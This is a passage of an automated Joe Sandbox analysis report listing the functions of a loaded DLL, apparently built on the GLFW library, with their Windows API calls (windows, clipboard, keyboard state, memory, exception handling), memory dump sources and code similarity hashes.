GetModuleHandleW.KERNEL32(?,?,?,?,?,64633B3C), ref: 6460BB53
LoadCursorW.USER32 ref: 6460BB68
GetModuleHandleW.KERNEL32(?,?), ref: 6460BB81
LoadImageW.USER32 ref: 6460BBB5
LoadImageW.USER32 ref: 6460BBF0
RegisterClassExW.USER32 ref: 6460BBFE

Strings

#, xrefs: 6460BB3E
0, xrefs: 6460BB2F

Memory Dump Source

Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd

Similarity

API ID: Load$HandleImageModule$ClassCursorRegister
String ID: #$0
API String ID: 1994909298-310112417
Opcode ID: 3bf254766e993e564a9534fe4bc37f7a9f591acf426d663c3deffeccc9797147
Instruction ID: 8833cee7edfb7f9070425f7573ad03eaceadb5a558f22546ce01d072ee062e0d
Opcode Fuzzy Hash: 3bf254766e993e564a9534fe4bc37f7a9f591acf426d663c3deffeccc9797147
Instruction Fuzzy Hash: F121EAB0808344DBEB01AFA5D95879EBBF4FF88705F00991DE59897240DBB989488B92

Function 6460309B Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@Jcd, xrefs: 6460311E
0cd, xrefs: 646030B8
`0ad, xrefs: 64603126
$0cd, xrefs: 646030CD
@0ad, xrefs: 646030C4

Memory Dump Source

Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd

Similarity

API ID:
String ID: 0cd$$0cd$@0ad$@Jcd$`0ad
API String ID: 0-1914348268
Opcode ID: 1bd3d9c5e908754d6cf1e74d1230158fa814d11c3498cb25bf0402f2b0ec90f1
Instruction ID: 9be3b192a5a6e4199c112d2803d7f13388fb0735954f6ca832e5783398968a45
Opcode Fuzzy Hash: 1bd3d9c5e908754d6cf1e74d1230158fa814d11c3498cb25bf0402f2b0ec90f1
Instruction Fuzzy Hash: 4311866160839087FB09AF66C74071AB598AB62A56F05D03DD9458BB40EB72C8C4C757

Function 6460BC57 Relevance: 6.0, APIs: 4, Instructions: 45
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RemovePropW.USER32 ref: 6460BCA4
DestroyWindow.USER32 ref: 6460BCB5
DestroyIcon.USER32(?,?,?,?,6460EC4B,00000001,64633B20,?,64602D7A), ref: 6460BCD3
DestroyIcon.USER32(?,?,?,?,6460EC4B,00000001,64633B20,?,64602D7A), ref: 6460BCE7

Part of subcall function 6460B80C: SetThreadExecutionState.KERNEL32 ref: 6460B82C
Part of subcall function 6460B80C: SystemParametersInfoW.USER32 ref: 6460B873

Memory Dump Source

Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd

Similarity

API ID: Destroy$Icon$ExecutionInfoParametersPropRemoveStateSystemThreadWindow
String ID:
API String ID: 1815938153-0
Opcode ID: d7b234f1f98a1b0dd1aaf22ca65479dfced2ab44939d0e5755922a7d14ec9752
Instruction ID: ef17fc05eb6e287ab9b56e4bfc9850124767209affbb755ce7ea69302aa2200f
Opcode Fuzzy Hash: d7b234f1f98a1b0dd1aaf22ca65479dfced2ab44939d0e5755922a7d14ec9752
Instruction Fuzzy Hash: 981109B0208245DFDF55AFA5C9C8B597BE8EF05A41F00987CE895CB246DB74D440CB21

Function 6460EC78 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 147
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

calloc.MSVCRT ref: 6460EDBA
glfwDestroyWindow.GLFW.3927611081 ref: 6460EE9E

Strings

00cd, xrefs: 6460ED3D

Memory Dump Source

Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd

Similarity

API ID: DestroyWindow.callocglfw
String ID: 00cd
API String ID: 443364576-4044054280
Opcode ID: 07d9f19076beabb2907ae6ff3bec3432acb4300f844c70ff2a8576bc708936d2
Instruction ID: dd3ab8de1e64792acb9e15d1505939a65c139ece9168a58cb7d13142409f8cd5
Opcode Fuzzy Hash: 07d9f19076beabb2907ae6ff3bec3432acb4300f844c70ff2a8576bc708936d2
Instruction Fuzzy Hash: D16117B0904B648FE726DF19C68438ABBF4FF45B14F00895EE89997790D375AA80CF42

Function 6460EBE8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

glfwMakeContextCurrent.GLFW.3927611081(00000001,64633B20,?,64602D7A,?,?,00000001,64613040,64633024,?,646030E9), ref: 6460EC3E

Part of subcall function 64602EF4: calloc.MSVCRT ref: 64603030
Part of subcall function 64602EF4: strcpy.MSVCRT ref: 64603079

Strings

3cd, xrefs: 6460EC50

Memory Dump Source

Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd

Similarity

API ID: ContextCurrent.Makecallocglfwstrcpy
String ID: 3cd
API String ID: 1788468011-159238042
Opcode ID: 2304726388e96dead50c1d61f080e64d457ad7172f610e80862ece414da8d9a7
Instruction ID: 03198bbc303c97b6376e433ddd5c4f80c2fcef52d2c33b9efc15072323d32dc3
Opcode Fuzzy Hash: 2304726388e96dead50c1d61f080e64d457ad7172f610e80862ece414da8d9a7
Instruction Fuzzy Hash: E801F7B17083408FE709AF58C2C039977E1EB55B19F00C46AD9A88F341D77788C19797

Function 64609B0E Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,?,64633B3C,?,64608F89), ref: 64609B2B

Part of subcall function 64602EF4: calloc.MSVCRT ref: 64603030
Part of subcall function 64602EF4: strcpy.MSVCRT ref: 64603079

Memory Dump Source

Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd

Similarity

API ID: HandleModulecallocstrcpy
String ID:
API String ID: 201297998-0
Opcode ID: fd2d56a074e933bbdbfcf0366e7dd8147be3146eb1afee0157ecf2b77bf12438
Instruction ID: 45fb95450c7f613d8c139586dc322b620b14055cfca3123252664d532c9aa62d
Opcode Fuzzy Hash: fd2d56a074e933bbdbfcf0366e7dd8147be3146eb1afee0157ecf2b77bf12438
Instruction Fuzzy Hash: F1F034B0508381DBDB06AF26D24978BBBE4EB55B88F00D91CE4D507240D3B5C488CB62

Non-executed Functions

Function 646053ED Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 70clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 6460E3DA
GetClipboardData.USER32 ref: 6460E402
CloseClipboard.USER32 ref: 6460E429

Part of subcall function 64608298: GetLastError.KERNEL32 ref: 646082DF
Part of subcall function 64608298: FormatMessageW.KERNEL32 ref: 64608317
Part of subcall function 64608298: WideCharToMultiByte.KERNEL32 ref: 64608357

Strings

?!cd, xrefs: 6460E415

Memory Dump Source

Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd

Similarity

API ID: Clipboard$ByteCharCloseDataErrorFormatLastMessageMultiOpenWide
String ID: ?!cd
API String ID: 3814655098-3029108249
Opcode ID: 3e00b10a35443fd6316c3cfce3fa4d2224ac93d0c0fa08c9f8415aeea459148c
Instruction ID: 1e3a5640424b765a1ace3aa08e8c3faaab073590e9099d1ebd5dcc15657c0ed4
Opcode Fuzzy Hash: 3e00b10a35443fd6316c3cfce3fa4d2224ac93d0c0fa08c9f8415aeea459148c
Instruction Fuzzy Hash: F7216DB060C350DBD7167FA9CA8479EBBE8FB56B55F01942CE5C5C3200D7B498848BA7

Function 64605394 Relevance: 10.6, APIs: 7, Instructions: 107memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32 ref: 6460E2F4
GlobalLock.KERNEL32 ref: 6460E31E
GlobalFree.KERNEL32(00000000), ref: 6460E392

Part of subcall function 64608298: GetLastError.KERNEL32 ref: 646082DF
Part of subcall function 64608298: FormatMessageW.KERNEL32 ref: 64608317
Part of subcall function 64608298: WideCharToMultiByte.KERNEL32 ref: 64608357

Memory Dump Source

Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd

Similarity

API ID: Global$AllocByteCharErrorFormatFreeLastLockMessageMultiWide
String ID:
API String ID: 3453243994-0
Opcode ID: 73381ce7e260493f79de8631a67482dc099fa0e6a5317d035ac0943809c6ed9a
Instruction ID: 1af1f2522bf29651f8543d3c7fd93ad5ccf7bd5a95a5199db3afa89fa8dc33f2
Opcode Fuzzy Hash: 73381ce7e260493f79de8631a67482dc099fa0e6a5317d035ac0943809c6ed9a
Instruction Fuzzy Hash: 85416AB0508341EFDB05AF6ACA4839EBFF4FB45761F00C92DE8888B240D3748484CBA2

Function 6460B019 Relevance: 10.6, APIs: 7, Instructions: 53keyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32 ref: 6460B02F
GetKeyState.USER32 ref: 6460B03F
GetKeyState.USER32 ref: 6460B051
GetKeyState.USER32 ref: 6460B063
GetKeyState.USER32 ref: 6460B06F
GetKeyState.USER32 ref: 6460B081
GetKeyState.USER32 ref: 6460B092

Memory Dump Source

Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd

Similarity

API ID: State
String ID:
API String ID: 1649606143-0
Opcode ID: 847e3df588da540dcf1b59635b2408ac9f6daf5b5d297e9ac9d3c2577dec495a
Instruction ID: 864026d1cb7c078cbe1523b34db08e4da42a9e532c9b22f97af7a2e5f9ad4f50
Opcode Fuzzy Hash: 847e3df588da540dcf1b59635b2408ac9f6daf5b5d297e9ac9d3c2577dec495a
Instruction Fuzzy Hash: EC0167B59043595EEB247BDACD447AFBEB8DF41BA4F41842EDAD413241C7B91040DAB2

Function 64610530 Relevance: 7.6, APIs: 5, Instructions: 55timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 6461056F
GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,646013E5), ref: 64610580
GetCurrentThreadId.KERNEL32 ref: 64610588
GetTickCount.KERNEL32 ref: 64610590
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,646013E5), ref: 6461059F

Memory Dump Source

Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: a903fcd543008832f528e1bd1313952d38995f44d5e3bb289cbb4e52cc730063
Instruction ID: 4098e1f792661b811c022bcd4256120fdc6bdbc12b5fdcfa95f35455c30f3de0
Opcode Fuzzy Hash: a903fcd543008832f528e1bd1313952d38995f44d5e3bb289cbb4e52cc730063
Instruction Fuzzy Hash: AC11A3B150C3408FDB10EF7AD58854BBBE4FB8A251F00583AE845C7B10EA30D498C782

Function 646105F0 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 6461063F
UnhandledExceptionFilter.KERNEL32 ref: 6461064F
GetCurrentProcess.KERNEL32 ref: 64610658
TerminateProcess.KERNEL32 ref: 64610669
abort.MSVCRT ref: 64610672

Memory Dump Source

Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminateabort
String ID:
API String ID: 520269711-0
Opcode ID: 8e68a6bfe9dddbc9460aaad5130a9c4fb207ff0a5dea586c87432d2b2070cb2e
Instruction ID: 48baf10372db0d9f919d5919cdc0d0d1cbca1b7c8996cf0b71dbba256961bdc2
Opcode Fuzzy Hash: 8e68a6bfe9dddbc9460aaad5130a9c4fb207ff0a5dea586c87432d2b2070cb2e
Instruction Fuzzy Hash: 201116B5908344CFEB11EF6EC14464ABBF0FB8A305F44952DE88897310E775A954CF92

Function 646105EC Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 6461063F
UnhandledExceptionFilter.KERNEL32 ref: 6461064F
GetCurrentProcess.KERNEL32 ref: 64610658
TerminateProcess.KERNEL32 ref: 64610669
abort.MSVCRT ref: 64610672

Memory Dump Source

Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminateabort
String ID:
API String ID: 520269711-0
Opcode ID: fc46e2344d4d6732d3eed0841b46266a61fc02ddebdf8d9c360195002ec89bb4
Instruction ID: 4368150bcebd0d5d296739eab8096d8ee2dcb78995e09cae170670a87d726f28
Opcode Fuzzy Hash: fc46e2344d4d6732d3eed0841b46266a61fc02ddebdf8d9c360195002ec89bb4
Instruction Fuzzy Hash: 841105B5908384CFEB11EF7EC549659BBF0FB4A305F449429E84497300E774A944CF92

Function 64608298 Relevance: 4.5, APIs: 3, Instructions: 49windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 646082DF
FormatMessageW.KERNEL32 ref: 64608317
WideCharToMultiByte.KERNEL32 ref: 64608357

Part of subcall function 64602EF4: calloc.MSVCRT ref: 64603030
Part of subcall function 64602EF4: strcpy.MSVCRT ref: 64603079

Memory Dump Source

Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd

Similarity

API ID: ByteCharErrorFormatLastMessageMultiWidecallocstrcpy
String ID:
API String ID: 4215368167-0
Opcode ID: 3a05718e056d70fd0ea33441e74aba6124f330db38033d56e7ba3221e27b8782
Instruction ID: adaf8a1903572cba01a8a3079a11a46211bc0e26c5758607537fd6aa15b1cc0a
Opcode Fuzzy Hash: 3a05718e056d70fd0ea33441e74aba6124f330db38033d56e7ba3221e27b8782
Instruction Fuzzy Hash: AA21D6B1408345DFE750EF69C54879ABBF1FB84314F00896DE5989B290C7B89A89CF82

Function 6460BA76 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25registryCOMMON

Download Yara Rule

APIs

RegisterRawInputDevices.USER32 ref: 6460BAA3

Part of subcall function 64608298: GetLastError.KERNEL32 ref: 646082DF
Part of subcall function 64608298: FormatMessageW.KERNEL32 ref: 64608317
Part of subcall function 64608298: WideCharToMultiByte.KERNEL32 ref: 64608357

Strings

@:ad, xrefs: 6460BA83

Memory Dump Source

Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd

Similarity

API ID: ByteCharDevicesErrorFormatInputLastMessageMultiRegisterWide
String ID: @:ad
API String ID: 2565755986-2778011840
Opcode ID: fb5363f0bf1a3cf9aff41d4085d91955f89f4dea58422cea29d870e782d30371
Instruction ID: 08e6777a9edac521f99355513d5423c6298ba1827fe259af2578882fcd771688
Opcode Fuzzy Hash: fb5363f0bf1a3cf9aff41d4085d91955f89f4dea58422cea29d870e782d30371
Instruction Fuzzy Hash: 58E065714082449BDB01EFA9D6047DEBBF8EF81715F408828D98557200DB759A48CB92

Function 6460CD2B Relevance: 1.5, APIs: 1, Instructions: 10windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32 ref: 6460CD3D

Memory Dump Source

Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd

Similarity

API ID: Iconic
String ID:
API String ID: 110040809-0
Opcode ID: d72d9febf81ae622c4ab3cc3c13540e0052c0e741e5a9b0b6ecada34421a14a3
Instruction ID: 50faefa21715e4e1c21aa030e48e9c97a0ede8ffee063f6bd876839af5adcc39
Opcode Fuzzy Hash: d72d9febf81ae622c4ab3cc3c13540e0052c0e741e5a9b0b6ecada34421a14a3
Instruction Fuzzy Hash: FEC08C382042049FCB00BF6CC54D8083BF8AF45202F4044A8A8818B302DA70E8008B92

